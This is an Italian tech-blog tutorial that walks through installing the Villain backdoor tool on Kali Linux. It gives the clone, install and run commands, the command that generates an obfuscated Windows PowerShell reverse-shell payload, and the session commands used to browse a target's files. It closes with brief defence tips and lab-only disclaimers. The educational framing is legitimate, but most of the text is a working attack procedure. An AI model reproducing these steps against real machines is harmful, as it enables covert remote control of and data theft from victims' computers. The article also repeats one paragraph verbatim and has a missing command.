
Come generare backdoor con il tool Villain
Cari lettori di Tecnogalaxy, oggi parleremo di un tool di nome Villain utilizzato per generare delle backdoor per Windows e Linux, è un gestore multisessione che consente agli utenti di connettersi con server fratelli (macchine che eseguono Villain) e condividere le loro sessioni di backdoor, se usato ovviamente legalmente utile per lavorare in gruppo.
Un cyber criminale però potrebbe utilizzarlo per scopi illegali, abbiamo già visto in altri articoli come può essere pericoloso eseguire un file senza essere sicuro al 100% della sua provenienza.
Oggi andremo a vedere come funziona e come difendersi da un attacco effettuato proprio con questo tool.
Come funziona il tool Villain
L’idea principale alla base dei payload generati da questo strumento è ereditata da HoaxShell, infatti si potrebbe dire che Villain ne è una versione evoluta appunto di HoaxShell.r
Tengo a precisare come sempre, che tutti questi test vengono fatti da me nel mio laboratorio e su macchine virtuali in mio possesso, attacchi su macchine senza la dovuta autorizzazione è illegale e perseguibilmente dalla legge. Non mi assumo nessuna responsabilità, la guida è a scopo puramente didattico.
Un cyber criminale però potrebbe utilizzarlo per scopi illegali, abbiamo già visto in altri articoli come può essere pericoloso eseguire un file senza essere sicuro al 100% della sua provenienza.
Oggi andremo a vedere come funziona e come difendersi da questo tipo di attacco.
Il tool viene utilizzato su Kali Linux e la relativa installazione è la classica: si effettua il clone da github.com per poi installarlo su Kali.
Iniziamo entrando nel dettaglio 😊.
Mi posiziono nella cartella dove voglio installare il tool:
cd desktop\windows\powershell (nel mio caso)
Effettuo il clone del tool:
sudo git clone https://github.com/t3l3machus/Villain.git
Mi posiziono nella cartella di Villain con il comando:
cd Villain
Installo i requisiti er poter eseguire il toll
pip3 install -r requirements.txt
ls (per vedere tutit i file presenti e per vedere se abbiamo i diritti amministratirvi)
Adesso eseguiamo Villain con il seguente comando:
sudo python3 Villain.py
Questa è la videata principale del tool dove è possibile creare il codice Power Shell:
generate os=windows lhost=eth0 obfuscate
A questo punto non ci resta che copiare il codice appena generato e farlo eseguire sul pc da testare.
Una volta eseguito sulla shell di Kali avremo il controllo del computer target, dove potremo navigare allinterno del disco C:\ e recuperare diverse informazioni.
Vediamo qual è la sessione attivata scrivendo il comando:
sessions
Copiamo il numero di session e scriviamo:
shell (il numero della sessione)
Adesso per vedere il contenuto di tutt ele cartelle scriviamo:
ls
Vedremo l’elenco di tutte le cartelle del computer.
Possiamo muoverci all’interno de disco scrivendo il comando:
cd Desktop
Se adesso scriviamo il comando ls potremo vedere come prima il contenuto del desktop:
ls
La cosa più pericolosa è che l’attaccante può copiare sul pc della vittima dei file senza che se ne accorca, con il comando:
Come possiamo vedere il file raw.txt è stato scaricato dalla macchina attaccante Kali Linux sul pc della vittima. Nel nostro test abbiamo scaricato un semplice file txt, un cyber criminale ovviamente avrebbe scaricato un file dannoso contenente magari una back door così da avere il pieno possesso del computer anche in futuro.
Come difendersi
Abbiamo visto che aprendo un file senza i dovuti controlli può diventare molto pericoloso. Dobbiamo sempre ricordarci che i cyber criminali fanno questo di lavoro, con l’inganno tramite le tecniche di ingegneria sociale, il phishing etc….veicolare la vittima nello scaricare il file diventa per loro molto semplice.
Proprio pe questo dobbiamo tenere sempre alta l’asticella della sicurezza, tenendo sempre aggiornato il proprio sistema opertaivo, utilizzare un antivirus professionale e verificare sempre la provenienza del file ricevuto.
Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.
Al prossimo articolo 😊
Non dimenticarti di iscriverti al mio canale Youtube.
N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.
Giorgio Perego
IT Manager
Leggi anche:
- Ecco come vedere gli attacchi hacker in tempo reale
- Ecco cosa è successo alla banca Silvergate
- Waldo: un nuovo motore di ricerca da provare
- La nuova AI di Snapchat basata su ChatGPT
- Quora ha creato il proprio ChatBot
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI